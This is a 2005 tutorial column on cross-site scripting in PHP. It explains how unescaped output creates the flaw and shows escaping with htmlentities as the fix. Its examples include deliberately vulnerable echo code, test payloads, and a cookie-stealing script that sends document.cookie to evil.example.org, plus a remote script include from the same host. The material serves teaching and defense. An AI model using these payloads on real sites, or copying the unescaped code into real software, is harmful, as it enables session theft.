Cross-Site Scripting

Published in PHP Architect on 21 Nov 2005

Cross-site scripting (XSS) is a poor description for a vulnerability, because the name refers to an old exploit. This is a common problem within the security community. A vulnerability is not known until someone discovers an exploit for it, so this is hardly surprising. The exploit gets named, and then all exploits that target the same vulnerability inherit the name.

The original XSS exploit involved the use of frames, a feature rarely used today. By using a frameset, one was able to include content from other domains (sites), and JavaScript within one frame was able to cross web site boundaries to access content from another frame.

The most common XSS exploits today don't necessarily do anything to cross sites, and this continues to be a cause of some confusion. Even some security experts have been known to shun the XSS label when an attack only involves a single site.

The Vulnerability

XSS exists when tainted data is allowed to enter the context of HTML without being properly escaped. Stated differently, when your PHP code outputs data that has neither been filtered nor escaped, it is definitely vulnerable to XSS. This is an easy mistake to make, and the following example demonstrates the vulnerability:

  1. <?php
  2.  
  3. echo $_POST['username'];
  4.  
  5. ?>

Athough this is an extreme example, it is hopefully clear that $_POST['username'] is just one (albeit obvious) example of tainted data. Sometimes, especially without a solid design, it is difficult to determine whether the data in a particular variable is tainted.

Some describe XSS as an input filtering problem, and this isn't entirely accurate. However, it's easy to see how people reach this conclusion. Consider the use of input filtering as protection:

  1. <?php
  2.  
  3. $clean = array();
  4.  
  5. if (ctype_alnum($_POST['username'])) {
  6.     $clean['username'] = $_POST['username'];
  7. }
  8.  
  9. echo "<p>Welcome, {$clean['username']}.</p>";
  10.  
  11. ?>

If the username is guaranteed to be alphanumeric, then it is safe to be used in the context of HTML. However, this technique addresses the symptom rather than the root cause of the problem. It's not always possible to eliminate XSS vulnerabilities with filtering alone. Sometimes, input filtering rules must be very relaxed to accommodate all valid data, and therefore not all valid data can be safely used in the context of HTML.

The real solution to the XSS problem requires developers to understand context. In PHP, we can safely store any data in a variable — even binary data. Once that data enters another context, such as HTML, it is important to ensure that it is treated only as data.

Understanding context is a topic worthy of its own column. Stay tuned.

The Exploits

There are an infinite number of XSS exploits, because the only limitations are those that naturally exist on the client side (and client-side scripting is becoming more and more powerful as browsers advance). I am often disappointed by the number of developers who do not appreciate the dangers that XSS presents. However, I do understand why many have doubts — example exploits are often benign. Security experts don't want to provide dangerous exploits for fear that they will be misused. One of the most common examples is to attempt to open an alert box:

  1. <script>alert('XSS')</script>

This is hardly a reason to worry, but it effectively identifies a vulnerability. Once a vulnerability is discovered, the possibilities are endless.

There are many variants of this benign attack, and some try to guess the specific context in which the data is used. For example, consider a form that repopulates itself whenever there is an error:

  1. <p>There was an error processing the form.
  2. Please try again.</p>
  3.  
  4. <form action="process.php" method="post">
  5. <p>Name:
  6. <input type="text"
  7.        name="name"
  8.        value="<?php echo $_POST['name']; ?>" /></p>
  9. <p>Location:
  10. <input type="text"
  11.        name="location"
  12.        value="<?php echo $_POST['location']; ?>" /></p>
  13.  
  14. <p><input type="submit"></p>
  15. </form>

Because this approach is so popular, another simple XSS test has emerged:

  1. "><script>alert('XSS')</script><"

If provided as the name in the previous example, the form element is redisplayed as follows:

  1. <p>Name:
  2. <input type="text"
  3.        name="name"
  4.        value=""><script>alert('XSS')</script><"" /></p>

By correctly guessing the context of the data (it is the value attribute of the form element), an attacker can successfully exploit the form.

Traditionally, malicious XSS exploits have been used to steal cookies, because document.cookie can be read and subsequently sent to a remote site using a variety of methods. For example, one such attack is to use XSS as a platform from which to launch a cross-site request forgery (CSRF) attack:

  1. <script>
  2. new Image().src =
  3.     'http://evil.example.org/steal.php?cookies=' +
  4.     encodeURI(document.cookie);
  5. </script>

If this JavaScript is present in a page on your web site (a possibility that XSS vulnerabilities yield), document.cookie contains cookies associated with your site, and the victim's browser sends a request to evil.example.org that includes these cookies. Then, steal.php uses $_GET['cookies'] to access them.

When an attack is too long (perhaps the application truncates the data), attackers can try to reference the malicious code instead, relying on the browser to fetch it:

  1. <script src="http://evil.example.org/evil.js"></script>

There are numerous other examples and test cases provided in the XSS Cheatsheet.

Emerging attacks are beginning to make use of new advances in client-side scripting, notably Ajax techniques. The most famous of these new attacks is the Myspace worm that infected more than a million accounts before being stopped. Although the viral nature of the worm was the result of a CSRF attack, it was XSS that provided the initial opening and made the worm possible.

What makes the Myspace worm particularly frightening is that the use of XMLHttpRequest() provides a way around the traditional CSRF protection of using a token in a form.

As the number of people well-versed in client-side technologies continues to increase, we are sure to see more and more creative XSS attacks emerge.

The Safeguards

You should always filter input, but protecting against XSS requires addressing the root cause of the problem — in the context of HTML, anything you want to be considered data needs to be escaped to ensure that it is so. For example, given $name and $location, the following demonstrates how this data can enter a new context:

  1. <?php
  2.  
  3. echo "<p>$name is from $location</p>";
  4.  
  5. ?>

You might be wondering why PHP can't escape these values automatically for you. The reason is that it can't predict your intentions. After all, you might have HTML tags within $name and $location that you intend to be interpreted by the browser:

  1. <?php
  2.  
  3. $name = "<em>$first_name $last_name</em>";
  4. $location = "<em>$city, $state</em>";
  5.  
  6. ?>

Only you can really know what you expect to be data (and nothing but data). Whatever your approach, you need to remember to escape the data that you want to preserve. For example, in the previous example, $first_name and $last_name are data, but the HTML bold tags that surround them are not. Therefore, both $first_name and $last_name should be escaped.

Escaping is a technique intended to preserve data in a new context. When data leaves your application, it enters a new context, and this is why I frequently simplify this rule to escape output.

Because this month's topic is XSS, the context in question is HTML, and there is a simple function to escape data you want to preserve in the context of HTML:

  1. <?php
  2.  
  3. $html = array();
  4.  
  5. $html['data'] = htmlentities($data, ENT_QUOTES, 'UTF-8');
  6.  
  7. ?>

Naming conventions (like the use of $html demonstrated here) can help you keep up with data that can be safely used in another context:

  1. <?php
  2.  
  3. $html = array();
  4.  
  5. $html['username'] = htmlentities($clean['username'], ENT_QUOTES, 'UTF-8');
  6.  
  7. echo "<p>Welcome, {$html['username']}.</p>";
  8.  
  9. ?>

Resist the temptation to consider input filtering to be the solution to XSS. As I mentioned previously, your input filtering rules might need to be so relaxed that they cannot offer adequate protection. Filtering your input helps ensure data integrity and can increase the reliability and predictability of your applications (all good things), but it does not address the root cause of XSS. I strongly recommend adhering to both practices (filter input and escape output), and input filtering offers strong protection against many other types of security vulnerabilities. It can also be considered a defense in depth mechanism.

Until Next Time...

I hope this article helps you appreciate the danger that XSS presents as well as the importance and purpose of escaping. Protecting your applications from XSS attacks requires a few very simple steps, notably escaping your output and employing the use of a naming convention (or similar approach) that can help you reliably distinguish between escaped and unescaped data.

Until next month, be safe.